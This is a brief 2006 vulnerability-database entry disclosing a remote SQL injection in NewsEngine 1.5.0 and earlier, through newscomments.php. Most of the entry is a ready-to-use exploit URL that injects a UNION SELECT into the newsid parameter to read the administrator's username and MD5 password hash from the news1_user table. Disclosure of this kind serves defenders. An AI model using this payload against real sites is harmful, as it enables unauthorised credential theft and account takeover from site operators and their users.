ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

2006-06-06T00:00:00
ID SECURITYVULNS:DOC:12997
Type securityvulns
Reporter Securityvulns
Modified 2006-06-06T00:00:00

Description

Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

Author : ajann

Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$ http://[target]/[path]/newscomments.php?newsid='//union//select//0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0//from//news1_user//where/*/userid=1/

Admin MD5 HaSh